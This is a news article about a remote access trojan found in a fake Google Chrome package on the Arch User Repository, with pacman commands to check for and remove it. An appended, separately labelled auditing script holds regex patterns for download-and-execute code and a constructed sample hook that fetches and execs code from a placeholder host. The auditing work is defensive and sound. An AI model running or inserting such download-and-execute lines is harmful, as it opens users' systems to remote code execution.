
Arch Linux Users at Risk Again as AUR Hit by Another RAT

A new pest appears in the Arch User Repository.


The Arch User Repository (AUR) is a popular resource for Arch Linux users. It hosts user-submitted build scripts for software not included in the official repositories. While its openness provides flexibility, it also introduces vulnerabilities.

Just a few weeks ago, the AUR was hit by a RAT (remote access trojan) that disguised itself inside browser-related packages. It infected systems during the install process using a malicious GitHub link embedded in the PKGBUILD script.

Now, a similar case has emerged, where a new package pretending to be Google Chrome has been caught carrying another hidden RAT script.

What's Happening: A package named google-chrome-stable made its way into the AUR, uploaded by a newly created user account called "forsenontop" that had no other activity.

According to Linuxiac, the package used an .install script to run a Python command that downloaded and executed remote code each time the Chrome browser was launched. The code runs silently in the background, with no visible signs to the user.

Luckily, the package was quickly removed by AUR admins once it was reported by a user.

What Now: As with the earlier incident, if you suspect you might be affected, first run the following command to check whether the malicious package is on your system:

pacman -Qs google-chrome-stable

If this package shows up on your system, remove it immediately with:

sudo pacman -Rns google-chrome-stable

And I will say this again: always make sure your system is up to date and only install packages from trusted sources.
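
One way to review a cloned AUR package before building it, as an added example that is not from the article, Linuxiac or the AUR: it flags download-and-execute patterns, such as the Python command described above, in the PKGBUILD and .install hooks. The function names, regex heuristics and sample files are assumptions constructed for illustration, not signatures taken from the removed package.

```bash
#!/bin/sh
# Added example: heuristic pre-build review of an AUR package directory.
# The patterns are assumptions about what download-and-execute code tends
# to look like; they are not signatures from the removed package.

# audit_file FILE: print "FILE:LINE:text" for each suspicious line.
# Returns 1 if anything matched, 0 if clean, 2 if the file is unreadable.
audit_file() {
    rc=0
    grep -nE \
        -e 'python[0-9.]*[[:space:]]+-c' \
        -e '(curl|wget)[^|;]*\|[[:space:]]*(ba|z)?sh' \
        -e 'urllib|urlopen|requests\.get' \
        -e '(^|[^[:alnum:]_])(exec|eval)[[:space:]]*\(' \
        -e 'base64[[:space:]]+(-d|--decode)' \
        -- "$1" /dev/null || rc=$?   # /dev/null forces the file name prefix
    case $rc in
        0) return 1 ;;   # at least one suspicious line
        1) return 0 ;;   # nothing matched
        *) return 2 ;;   # grep could not read the file
    esac
}

# audit_pkg_dir DIR: check PKGBUILD and every *.install hook in DIR.
# Returns 1 if any file was flagged or could not be read.
audit_pkg_dir() {
    flagged=0
    for f in "$1"/PKGBUILD "$1"/*.install; do
        [ -f "$f" ] || continue
        audit_file "$f" || flagged=1
    done
    return "$flagged"
}

# make_sample DIR: write constructed sample files (not the real package).
make_sample() {
    mkdir -p "$1/bad" "$1/good"
    printf '%s\n' 'pkgname=demo' 'install=demo.install' > "$1/bad/PKGBUILD"
    printf '%s\n' 'post_install() {' \
        "    python -c \"import urllib.request as u; exec(u.urlopen('https://example.invalid/constructed').read())\"" \
        '}' > "$1/bad/demo.install"
    printf '%s\n' 'post_install() {' '    update-desktop-database -q' '}' \
        > "$1/good/demo.install"
}

# Usage: sh audit.sh path/to/cloned-aur-package
if [ "$#" -gt 0 ]; then audit_pkg_dir "$1"; fi
```

A clean result only means none of these heuristics matched; read the PKGBUILD and .install files yourself before running makepkg.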

Via: Linuxiac
